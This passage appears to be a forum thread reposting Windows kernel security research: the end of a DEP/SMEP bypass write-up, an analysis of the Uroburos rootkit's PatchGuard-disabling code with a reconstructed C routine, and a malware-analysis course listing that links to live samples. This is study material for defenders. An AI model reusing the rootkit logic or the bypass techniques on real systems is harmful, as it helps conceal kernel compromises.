lot of adjacent data, the technique can still be used because it is unlikely that any important structures are located in the adjacent memory. With this blog post, we provide an exploit for a custom driver with a very simple write-what-where vulnerability so as to let the reader experiment with the technique. However, this document was originally submitted to Microsoft with a real-world use-after-free vulnerability. Indeed, in a lot of cases, it would be possible for an attacker to force a write-what-where primitive from a vulnerability such as a use-after-free or a pool overflow. Mitigating the Attack This technique is not affected by KASLR because it is possible to directly derive the addresses of paging structures from a given virtual address. If randomization was introduced into this mapping, this would no longer be possible, and this technique would be mitigated as a result. Randomizing this function would require having a different self-referencing PML4 entry each time the kernel boots. However, it is recognised that many of the core functions of the kernel memory management may rely on this mapping to locate and update paging structures. It might also be possible to move the paging structures into a separate segment, and reference these structures using an offset in that segment. If we consider the typical write-what-where scenarios, unless the address specified already had a segment prefix, it would not be possible for an attacker to overwrite the paging structures, even if the offset within the segment was known. If this is not possible, another approach might be to use a hardware debug register as a faux locking mechanism. For example, if a hardware breakpoint was set on the access to the paging structures (or key fields of the structures), a handler for that breakpoint could test the value of the debug register to assess whether this access is legitimate or not. For example, before a legitimate modification to the paging structures, the kernel can unset the debug register, and no exception would be thrown. If an attacker attempted to modify the memory without unsetting the debug register, an exception could be thrown to detect this. Vendor Response We reported this issue to Microsoft as part of their Mitigation Bypass Bounty Program. However, they indicated that this did not meet all of their program guidelines as it cannot be used to remotely exploit user-mode vulnerabilities. In addition, Microsoft stated that their security engineering team were aware of this “limitation”, they did not consider this a security vulnerability, and that the development of a fix was not currently planned. With this in mind, we have decided to release this post and the accompanying code to provide a public example of current Windows kernel research. However, we have chosen not to release the fully weaponised exploit we developed as part of the submission to Microsoft, as this makes use of a vulnerability that has only recently been patched. Conclusion The technique proposed in this post allows an attacker to reliably bypass both DEP and SMEP in a generic way. We showed that it is possible to derive the addresses of paging structures from a virtual address, and how an attacker could use this to corrupt paging structures so as to create executable kernel memory, even in low memory addresses. We demonstrated that this technique is usable without the fear of corrupting non targeted PXEs, even if the attacker had to corrupt large quantities of memory. Furthermore, we showed that this technique is not specific to bugs that provide a write-what-where primitive, but can also be used for a broad range of bug classes. Sursa: https://labs.mwrinfosecurity.com/blog/2014/08/15/windows-8-kernel-memory-protections-bypass/
-
The Windows 8.1 Kernel Patch Protection In the last 3 months we have seen a lot of machines compromised by Uroburos (a kernel-mode rootkit that spreads in the wild and specifically targets Windows 7 64-bit). Curiosity lead me to start analyzing the code for Kernel Patch Protection on Windows 8.1. We will take a glance at its current implementation on that operating system and find out why the Kernel Patch Protection modifications made by Uroburos on Windows 7 don’t work on the Windows 8.1 kernel. In this blog post, we will refer to the technology known as “Kernel Patch Protection” as “Patchguard”. Specifically, we will call the Kernel Patch Protection on Windows 7 “Patchguard v7”, and the more recent Windows 8.1 version “Patchguard v8”. The implementation of Patchguard has slightly changed between versions of Windows. I would like to point out the following articles that explain the internal architecture of older versions of Patchguard: Skape, Bypassing PatchGuard on Windows x64, Uninformed, December 2005 Skywing, PatchGuard Reloaded - A Brief Analysis of PatchGuard Version 3, Uninformed, September 2007 Christoph Husse, Bypassing PatchGuard 3 - CodeProject, August 2008 Kernel Patch Protection - Old version attack methods We have seen some attacks targeting older versions of the Kernel Patch Protection technology. Some of those (see Fyyre’s website for examples) disarm Patchguard by preventing its initialization code from being called. Patchguard is indeed initialized at Windows startup time, when the user switches on the workstation. To do this, various technologies have been used: the MBR Bootkit (PDF, in Italian), VBR Bootkit, and even a brand-new UEFI Bootkit. These kind of attacks are quite easy to implement, but they have a big drawback: they all require the victim's machine to be rebooted, and they are impossible to exploit if the target system implements some kind of boot manager digital signature protection (like Secure Boot). Other techniques relied on different tricks to evade Patchguard or to totally block it. These techniques involve: x64 debug registers (DR registers) - Place a managed hardware breakpoint on every read-access in the modified code region. This way the attacker can restore the modification and then continue execution Exception handler hooking - PatchGuard’s validation routine (the procedure that calls and raises the Kernel Patch protection checks) is executed through exception handlers that are raised by certain Deferred Procedure Call (DPC) routines; this feature gives attackers an easy way to disable PatchGuard. Hooking KeBugCheckEx and/or other kernel key functions - System compromises are reported through the KeBugCheckEx routine (BugCheck code 0x109); this is an exported function. PatchGuard clears the stack so there is no return point once one enters KeBugCheckEx, though there is a catch. One can easily resume the thread using the standard “thread startup” function of the kernel. Patching the kernel timer DPC dispatcher - Another attack cited by Skywing (see references above). By design, PatchGuard’s validation routine relies on the dispatcher of the kernel timers to kick in and dispatch the deferred procedure call (DPC) associated with the timer. Thus, an obvious target for attackers is to patch the kernel timer’s DPC dispatcher code to call their own code. This attack method is easy to implement. Patchguard code direct modification - Attack method described in a paper by McAfee. They located the encrypted Patchguard code directly in the kernel heap, then manually decrypted it and modified its entry point (the decryption code). The Patchguard code was finally manually re-encrypted. The techniques described above are quite ingenious. They disable Patchguard without rebooting the system or modify boot code. It’s worth noting that the latest Patchguard implementation has rendered all these techniques obsolete, because it has been able to completely neutralize them. Now let’s analyse how the Uroburus rootkit implements the KeBugCheckEx hooks to turn off Kernel Patch Protection on a Windows 7 SP1 64-bit system. Uroburus rootkit - KeBugCheckEx’ hook Analysing an infected machine reveals that the Uroburos 64-bit driver doesn’t install any direct hook on the kernel crash routine named “KeBugCheckEx”. So why doesn't it do any direct modification? To answer this question, an analysis of Patchguard v7 code is needed. Patchguard copies the code of some kernel functions into a private kernel buffer. The copied procedures are directly used by Patchguard to perform all integrity checks, including crashing the system if any modification is found.In the case of system modifications, it copies the functions back to their original location and crashes the system. The problem with the implementation of Patchguard v7 lies in the code for the procedures used by protected routines. That code is vulnerable to direct manipulation as there is only one copy (the original one) This is, in fact, the Uroburos strategy: KeBugCheckEx is not touched in any manner. Only a routine used directly by KeBugCheckEx is forged: RtlCaptureContext. The Uroburos rootkit installs deviations in the original Windows Kernel routines by registering custom software interrupt 0x3C. In the forged routines, the interrupt is raised using the x86 opcode “int” RtlCaptureContext The related Uroburos interrupt service routine of the RtlCaptureContext routine (sub-type 1), is raised by the forged code. The software interrupt is dispatched, the original routine called and finally the processor context is analysed. A filter routine is called. It implements the following code: /* Patchguard Uroburos Filter routine* dwBugCheckCode - Bugcheck code saved on the stack by KeBugCheckEx routine * lpOrgRetAddr - Original RtlCaptureContext call return address */ void PatchguardFilterRoutine(DWORD dwBugCheckCode, ULONG_PTR lpOrgRetAddr) { LPBYTE pCurThread = NULL; // Current running thread LPVOID lpOrgThrStartAddr = NULL; // Original thread DWORD dwProcNumber = 0; // Current processor number ULONG mjVer = 0, minVer = 0; // OS Major and minor version indexes QWORD * qwInitialStackPtr = 0; // Thread initial stack pointer KIRQL kCurIrql = KeGetCurrentIrql(); // Current processor IRQL // Get Os Version PsGetVersion(&mjVer, &minVer, NULL, NULL); if (lpOrgRetAddr > (ULONG_PTR)KeBugCheckEx && lpOrgRetAddr < ((ULONG_PTR)KeBugCheckEx + 0x64) && dwBugCheckCode == CRITICAL_STRUCTURE_CORRUPTION) { // This is the KeBugCheckEx Patchguard invocation // Get Initial stack pointer qwInitialStackPtr = (LPQWORD)IoGetInitialStack(); if (g_lpDbgPrintAddr) { // DbgPrint is forged with a single "RETN" opcode, restore it // DisableCR0WriteProtection(); // ... restore original code ... // RestoreCR0WriteProtection(); // Revert CR0 memory protection } pCurThread = (LPBYTE)KeGetCurrentThread(); // Get original thread start address from ETHREAD lpOrgThrStartAddr = *((LPVOID*)(pCurThread + g_dwThrStartAddrOffset)); dwProcNumber = KeGetCurrentProcessorNumber(); // Initialize and queue Anti Patchguard Dpc KeInitializeDpc(&g_antiPgDpc, UroburusDpcRoutine, NULL); KeSetTargetProcessorDpc(&g_antiPgDpc, (CCHAR)dwProcNumber); KeInsertQueueDpc(&g_antiPgDpc, NULL, NULL); // If target Os is Windows 7 if (mjVer >= 6 && minVer >= 1) // Put stack base address in first stack element qwInitialStackPtr[0] = ((ULONG_PTR)qwInitialStackPtr + 0x1000) & (~0xFFF); if (kCurIrql > PASSIVE_LEVEL) { // Restore original DPC context ("KiRetireDpcList" Uroburos interrupt plays // a key role here). This call doesn't return RestoreDpcContext(); // The faked DPC will be processed } else { // Jump directly to original thread start address (ExpWorkerThread) JumpToThreadStartAddress((LPVOID)qwInitialStackPtr, lpOrgThrStartAddr, NULL); } } } As the reader can see, the code is quite straightforward. First it analyses the original context: if the return address lives in the prologue of the kernel routine KeBugCheckEx and the bugcheck code equals to CRITICAL_STRUCTURE_CORRUPTION , then it means that Uroburos has intercepted a Patchguard crash request. The initial thread start address and stack pointer is obtained from the ETHREAD structure and a faked DPC is queued: // NULL Uroburos Anti-Patchguard DPCvoid UroburusDpcRoutine(struct _KDPC *Dpc, PVOID DeferredContext, PVOID SystemArgument1, PVOID SystemArgument2) { return; } Code execution is resumed in one of two different places based on the current Interrupt Request Level (IRQL). If IRQL is at the PASSIVE_LEVEL then a standard JMP opcode is used to return to the original start address of the thread from which the Patchguard check originated (in this case, it is a worker thread created by the “ExpWorkerThread” routine). If the IRQL is at a DISPATCH_LEVEL or above, Uroborus will exploit the previously acquired processor context using the KiRetireDpcList hook. Uroburos will then restart code execution at the place where the original call to KiRetireDpcList was made, remaining at the high IRQL level. The faked DPC is needed to prevent a crash of the restored thread. KiRetireDpcList and RtlLookupFunctionEntry As shown above, the KiRetireDpcList hook is needed to restore the thread context in case of a high IRQL. This hook saves the processor context before the original call is made and then transfers execution back to the original KiRetireDpcList Windows code. Publicly available literature about Uroburos claims that the RtlLookupFunctionEntry hook is related to the Anti-Patchguard feature. This is wrong. Our analysis has pinpointed that this hook is there only to hide and protect the Uroburos driver’s RUNTIME_FUNCTIONarray (see my previous article about Windows 8.1 Structured Exception Handling). Conclusion The Uroburos anti-Patchguard feature code is quite simple but very effective. This method is practically able to disarm all older versions of the Windows Kernel Patch protection without any issues or system crashes. Patchguard v8 - Internal architecture STARTUP The Windows Nt Kernel startup is accomplished in 2 phases. The Windows Internals book describes the nitty-gritty details of both phases. Phase 0 builds the rudimentary kernel data structures required to allow the services needed in phase 1 to be invoked (page tables, per-processor Processor Control Blocks (PRCBs), internal lists, resources and so on…). At the end of phase 0, the internal routine InitBootProcessor uses a large call stack that ends right at the Phase1InitializationDiscard function. This function, as the name implies, discards the code that is part of the INIT section of the kernel image in order to preserve memory. Inside it, there is a call to the KeInitAmd64SpecificState routine. Analysing it reveals that the code is not related to its name: int KeInitAmd64SpecificState() { DWORD dbgMask = 0; int dividend = 0, result = 0; int value = 0; // Exit in case the system is booted in safe mode if (InitSafeBootMode) return 0; // KdDebuggerNotPresent: 1 - no debugger; 0 - a debugger is attached dbgMask = KdDebuggerNotPresent; // KdPitchDebugger: 1 - debugger disabled; 0 - a debugger could be attached dbgMask |= KdPitchDebugger; if (dbgMask) dividend = -1; // Debugger completely disabled else dividend = 0x11; // Debugger might be enabled value = (int)_rotr(dbgMask, 1); // “value” is equal to 0 if debugger is enable // 0x80000000 if debugger is NOT enabled // Perform a signed division between two 32 bit integers: result = (int)(value / dividend); // IDIV value, dividend return result; } The routine’s code ends with a signed division: if a debugger is present the division is evaluated to 0 (0 divided by 0x11 is 0), otherwise a strange thing happens: 0x80000000 divided by 0xFFFFFFFF raises an overflow exception. To understand why, let’s simplify everything and perform as an example an 8-bit signed division such as: -128 divided by -1. The result should be +128. Here is the assembly code: mov cl, FFh mov ax, FF80h idiv cl The last instruction clearly raises an exception because the value +128 doesn’t fit in the destination 8-bit register AL (remember that we are speaking about signed integers). Following the SEH structures inside of the Nt Kernel file leads the code execution to the “KiFilterFiberContext” routine. This is another procedure with a misleading name: all it does is disable a potential debugger, and prepare the context for the Patchguard Initialization routine. The initialization routine of the Kernel Patch Protection technology is a huge function (95 KB of pure machine code) inside the INIT section of Nt Kernel binary file. From now on, we will call it “KiInitializePatchguard”. INTERNAL ARCHITECTURE, A QUICK GLANCE The initialization routine builds all the internal Patchguard key data structures and copies all its routines many times. The code for KiInitializePatchguard is very hard to follow and understand because it contains obfuscation, useless opcode, and repeated chunks. Furthermore, it contains a lot checks for the presence of debugger. After some internal environment checks, it builds a huge buffer in the Kernel Nonpaged pool memory that contains all the data needed by Patchguard. This buffer is surrounded by a random numbers of 8 bytes QWORD seed values repetitively calculated with the “RDTSC” opcode. Image: https://lh4.googleusercontent.com/oym_O5vcYyOXAlauXqrwRVVEt2rkj27OED4AwT90LsveJ6KfUbfFqh_lx-ZJxEasIVx_aTU6Fqdreh5pNm55yK5vPcS7xPM0TZ5VpWrotqJUjRsBEE9ax06G-N5_oa3aBA As the reader can see from the above picture , the Patchguard buffer contains a lot of useful info. All data needed is organized in 3 main sections: Internal configuration data The first buffer area located after the TSC (time stamp counter) Seed values contains all the initial patchguard related configuration data. Noteworthy are the 2 Patchguard Keys (the master one, used for all key calculation, and the decryption key), the Patchguard IAT (pointers of some Nt kernel function) and all the needed Kernel data structures values (for example the KiWaitAlways symbol, KeServiceDescriptorTable data structure, and so on…), the Patchguard verification Work item, the 3 copied IDT entries (used to defeat the Debug registers attack), and finally, the various Patchguard internal relocated functions offsets. Patchguard and Nt Vital routines code This section is very important because it contains the copy of the pointers and the code of the most important Nt routines used by Patchguard to crash the system in case of something wrong is found. In this way even if a rootkit tries to forge or block the crash routines, Patchguard code can completely defeat the malicious patch and correctly crash the system. Here is the list of the copied Nt functions: HaliHaltSystem, KeBugCheckEx, KeBugCheck2, KiBugCheckDebugBreak, KiDebugTrapOrFault, DbgBreakPointWithStatus, RtlCaptureContext, KeQueryCurrentStackInformation, KiSaveProcessorControlState, HalHaltSystem pointer Furthermore the section contains the entire “INITKDBG” code section of Nt Kernel. This section implement the main Patchguard code: - Kernel Patch protection main check routine and first self-verification procedure - Patchguard Work Item routine, system crash routine (that erases even the stack) - Patchguard timer and one entry point (there are many others, but not in INITKDBG section) Protected Code and Data All the values and data structures used to verify the entire Nt kernel code resides here. The area is huge (227 KB more or less) and it is organized in at least 3 different way: [*=1] First 2 KB contains an array of data structures that stores the code (and data) chunks pointer, size, and relative calculated integrity keys of all the Nt functions used by Kernel Patch Protection to correctly do its job. [*=1] Nt Kernel Module (“ntoskrnl.exe”) base address and its Exception directory pointer, size and calculated integrity key. A big array of DWORD keys then follows. For each module’s exception directory RUNTIME_FUNCTION entry there is a relative 4 bytes key. In this manner Patchguard can verify each code chunk of the Nt Kernel. [*=1] A copy of all Patchguard protected data. I still need to investigate the way in which the protected Patchguard data (like the global “CI.DLL” code integrity module’s “g_CiOptions” symbol for example) is stored in memory, but we know for sure that the data is binary copied from its original location when the OS is starting in this section VERIFICATION METHODS - Some Words Describing the actual methods used to verify the integrity of the running Operating system kernel is outside the scope of this article. We are going only to get an introduction... Kernel Patch protection has some entry points scattered inside the Kernel: 12 DPC routines, 2 timers, some APC routines, and others. When the Patchguard code acquires the processor execution, it decrypts its buffer and then calls the self-verify routine. The latter function first verifies 0x3C0 bytes of the Patchguard buffer (including the just-executed decryption code), re-calculating a checksum value and comparing it with the stored one. Then it does the same verification as before, but for the Nt Functions exploited by its main check routine. The integrity keys and verification data structures are stored in the start of area 3 of PG buffer. If one of the checks goes wrong, Patchguard self-verify routine immediately crashes the system. It does this in a very clever manner: First it restores all the Virtual memory structures values of vital Nt kernel functions (like Page table entry, Page directory entry and so on…). Then it replaces all the code with the copied one, located in the Patchguard buffer. In this way each eventual rootkit modification is erased and as result Patchguard code can crash the system without any obstacles. Finally calls “SdbpCheckDll” routine (misleading name) to erase the current thread stack and transfer execution to KeBugCheckEx crash routine. Otherwise, in the case that all the initial checks pass, the code queues a kernel Work item, exploiting the standard ExQueueWorkItem Kernel API (keep in mind that this function has been already checked by the previous self-verify routine). The Patchguard work item code immediately calls the main verification routine. It then copies its own buffer in another place, re-encrypt the old Patchguard buffer, and finally jumps to the ExFreePool Kernel function. The latter procedure will delete the old Patchguard buffer. This way, every time a system check is raised, the Patchguard buffer location changes. Main check routine uses some other methods to verify each Nt Kernel code and data chunk. Describing all of them and the functionality of the main check routine is demanded to the next blog post…. The code used by Patchguard initialization routine to calculated the virtual memory data structure values is something curious. Here is an example used to find the Page Table entry of a 64-bit memory address: CalculatePteVa: shr rcx, 9 ; Original Ptr address >> 9 mov rax, 98000000000h ; This negated value is FFFFFF680'00000000, or more ; precisely "16 bit set to 1, X64 auto-value, all zeros" mov r15, 07FFFFFFFF8h and rcx, r15 ; RCX & 7F'FFFFFFF8h (toggle 25 MSB and last 3 LSB) sub rcx, rax ; RCX += FFFFFF680'00000000 mov rax, rcx ; RAX = VA of PTE of target function For the explanation on how it really works, and what is the x64 0x1ED auto-value, I remind the reader to the following great book about X64 Memory management: Enrico Martignetti - What Makes it Page? The Windows 7 (x64) Virtual Memory Manager (2012) Conclusions In this blog post we have analysed the Uroburos code that disables the old Windows 7 Kernel Patch Protection, and have given overview of the new Patchguard version 8 implementation. The reader should now be able to understand why the attacks such as the one used by Uroburos could not work with the new version of Kernel Patch Protection. It seems that the new implementation of this technology can defeat all known attacks. Microsoft engineers have done a great amount of work to try to mitigate a class of attacks . Because of the fact that the Kernel Patch Protection is not hardware-assisted, and the fact that its code runs at kernel-mode privilege level (the same of all kernel drivers), it is not perfect. At an upcoming conference, I will demonstrate that a clever researcher can still disarm this new version, even if it’s a task that is more difficult to accomplish. The researcher can furthermore use the original Microsoft Patchguard code even to protect his own hooks…. Stay tuned! Sursa: VRT: The Windows 8.1 Kernel Patch Protection
-
Creator: Veronica Kovah License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Class Prerequisites: None Lab Requirements: Linux system with VirtualBox and Windows XP VM. Class Textbooks: “Practical Malware Analysis” by Michael Sikorski and Andrew Honig Recommended Class Duration: 2-3 days Creator Available to Teach In-Person Classes: Yes Author Comments: This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding We will achieve the items above by first learning the individual techniques sandboxes utilize. We will show how to capture and record registry, file, network, mutex, API, installation, hooking and other activity undertaken by the malware. We will create fake network responses to deceive malware so that it shows more behavior. We will also talk about how using MITRE's Malware Attribute Enumeration & Characterization (MAEC - pronounced "Mike") standard can help normalize the data obtained manually or from sandboxes, and improve junior malware analysts' reports. The class will additionally discuss how to take malware attributes and turn them into useful detection signatures such as Snort network IDS rules, or YARA signatures. Dynamic analysis should always be an analyst's first approach to discovering malware functionality. But this class will show the instances where dynamic analysis cannot achieve complete analysis, due to malware tricks for instance. So in this class you will learn when you will need to use static analysis, as offered in follow the follow on Introduction to Reverse Engineering and Reverse Engineering Malware classes. During the course students will complete many hands on exercises. Course Objectives: * Understand how to set up a protected dynamic malware analysis environment * Get hands on experience with various malware behavior monitoring tools * Learn the set of malware artifacts an analyst should gather from an analysis * Learn how to trick malware into exhibiting behaviors that only occur under special conditions * Create actionable detection signatures from malware indicators This class is recommended for a later class on malware static analysis. This is so that students understand both techniques, and utilize the technique which gives the quickest answer to a given question. Every attempt was made to properly cite references, but if any are missing, please contact the author. Class Materials All Materials (.zip of odp(222 slides) & class malware examples) All Materials (.zip of pdf(222 slides) & class malware examples) Slides Part 1 (Background concepts, terms, tools & lab setup, 68 slides) Slides Part 2 (RAT Analysis (Poison Ivy), persistence & maneuvering (how the malware strategically positions itself on the system, 67 slides) Slides Part 3 (Malware functionality (e.g. keylogging, phone home, security degradation, self-destruction, etc), 43 slides) Slides Part 3 (Using an all-in-one sandbox (Cuckoo), MAEC, converting output to actionable indicators of malware presence (e.g. Snort/Yara signatures), 44 slides) malware samples used in class. Password is “infected” HD Videos on Youtube Full quality downloadable QuickTime, h.264, and Ogg videos at Archive.org: Day 1 Part 1 : Introduction (8:10) Day 1 Part 2 : Background: VirtualBox (5:56) Day 1 Part 3 : Background: PE files & Packers (17:00) Day 1 Part 4 : Background: File Identification (15:44) Day 1 Part 5 : Background: Windows Libraries (4:27) Day 1 Part 6 : Background: Windows Processes (35:16) Day 1 Part 7 : Background: Windows Registry (18:07) Day 1 Part 8 : Background: Windows Services (25:52) Day 1 Part 9 : Background: Networking Refresher (27:38) Day 1 Part 10 : Isolated Malware Lab Setup (26:47) Day 1 Part 11 : Malware Terminology (6:50) Day 1 Part 12 : Playing with Malware: Poison Ivy RAT (30:54) Day 1 Part 13 : Behavioral Analysis Overview (5:30) Day 1 Part 14 : Persistence (34:54) Day 2 will be posted Aug 24th Day 3 was lost due to a video server malfunction. The class will be re-delivered at MITRE in September, and day 3 be re-recorded then. Sursa: MalwareDynamicAnalysis